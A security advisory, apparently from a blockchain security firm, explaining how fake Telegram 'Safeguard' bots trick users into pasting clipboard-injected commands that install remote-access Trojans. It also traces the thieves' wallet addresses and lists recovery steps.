Scam Analysis
This type of scam can be divided into two categories: one is to steal Telegram accounts, where scammers trick users into entering their phone numbers, verification codes, and even Two-Step Verification passwords to steal their Telegram accounts; the other is to plant Trojans on the user's computer, which has become a more common method recently, and this article will focus on the second method.
In some highly popular token airdrop activities, when the user's FOMO emotion is at its peak, they see the Channel interface in Telegram as shown in the image below and will definitely click on "Tap to verify":
After clicking "Tap to verify", a fake Safeguard bot will open, which appears to be performing verification, but this verification window is extremely short, giving the user a sense of urgency and forcing them to continue the operation.
Continuing to click, the result "pretends" to show that the verification is unsuccessful, and finally the prompt interface for the user to manually verify appears:
The scammers have thoughtfully configured Step1, Step2, Step3, and at this point, the user's clipboard already contains malicious code.
As long as the user doesn't actually follow these few Steps to operate, there won't be a problem:
But if the user obediently follows these few Steps, the computer will be infected with a virus.
Here's another example - the attacker impersonates a KOL and uses a malicious bot to guide the execution of Powershell malicious code. The scammers create a fake KOL X account, and then they post a Telegram link in the comments, inviting users to join an "exclusive" Telegram group to get investment information. For example, the comment area of @BTW0205 has a Scam account, and many users will see an "exciting message" in the comments:
Then they enter the corresponding Telegram Channel and guide the user to verify.
When the user clicks on the verification, a fake Safeguard appears, similar to the above process, with Step1, Step2, Step3 to guide the verification operation.
At this point, the user's clipboard has secretly been implanted with malicious code content. If the user really follows the guide to open the execution box and Ctrl + V the malicious code content into the execution box, the state will be as shown in the figure below, where the entire content cannot be seen in the execution box, with a large blank space in front of the Telegram text and the malicious code.
These malicious codes are usually Powershell commands, which, when executed, will silently download more complex malicious codes, ultimately infecting the computer with a remote control Trojan (such as Remcos). Once the computer is controlled by the Trojan, the hacker can remotely steal the wallet files, seed phrases, private keys, passwords and other sensitive information in the computer, and even steal the assets.
The Ethereum Foundation account @ethereumfndn comment area has also been contaminated by this kind of scam, showing a large-scale net-casting and harvesting mode.
The latest one is the comment area of Trump's X account, which has also been contaminated by this kind of scam:
If you are on a mobile phone, the scam will gradually obtain your Telegram permissions. If you discover it in time, you need to quickly go to Telegram settings, Privacy and Security -> Active sessions -> Terminate all other sessions, and then add or modify the Two-Step Verification.
If you are not on a Windows computer, but a Mac computer, there are similar ways to lure you into infecting your computer. The routine is similar, and when the image below appears in Telegram, your clipboard has already been secretly implanted with malicious code content.
At this point, there is no risk yet, but if you follow the given steps, the consequences will be as shown in the figure below:
MistTrack Analysis
We have selected several hacker addresses and used the on-chain tracking and anti-money laundering platform MistTrack for analysis.
Solana hacker addresses:
HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV
2v1DUcjyNBerUcYcmjrDZNpxfFuQ2Nj28kZ9mea3T36W
D8TnJAXML7gEzUdGhY5T7aNfQQXxfr8k5huC6s11ea5R
According to the analysis of MistTrack, the above three hacker addresses have currently earned over $1.2 million, including SOL and multiple SPL Tokens.
The hackers first convert most of the SPL Tokens into SOL:
Then they disperse and transfer the SOL to multiple addresses, and the hacker addresses also interact with platforms such as Binance, Huobi, and FixedFloat:
In addition, the address HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV still has a balance of 1,169.73 SOL and Tokens worth over $10,000.
We also analyzed one of the Ethereum hacker addresses 0x21b681c98ebc32a9c6696003fc4050f63bc8b2c6, whose first transaction was in January 2025, involving multiple chains, and currently has a balance of around $130,000.
This address has transferred ETH to multiple platforms such as ChangeNOW, eXch, and Cryptomus.com:
How to Prevent
If your computer is infected, you need to do the following immediately:
1. Immediately transfer the wallets and funds used on this computer, don't think that the wallet with the password of the extension wallet is safe;
2. Change the passwords or 2FA of all accounts logged in through the browsers stored on this computer as much as possible;
3. Change the passwords of other accounts on the computer, such as Telegram, if possible.
You should make the most extreme assumptions, as your computer is infected, it is transparent to the scammers. So think in reverse, if you were a scammer, what would you do with a computer that is active in the Web3/Crypto world that you have full control over. Finally, after backing up important data on the computer, you can reinstall the system, but it is best to install well-known international antivirus software such as AVG, Bitdefender, Kaspersky, etc. after reinstallation, and the problem will be solved after a full antivirus.
Summary
The fake Safeguard scam has evolved into a mature hacker attack model, from faking reviews to luring traffic, to implanting Trojan viruses, and finally to stealing assets, the entire process is hidden and efficient. As the attack methods become more and more sophisticated, users need to be more vigilant about various inducing links and operation steps on the Internet, and can effectively prevent the harm of such scams by improving vigilance, strengthening protection, and promptly detecting and dealing with potential threats.
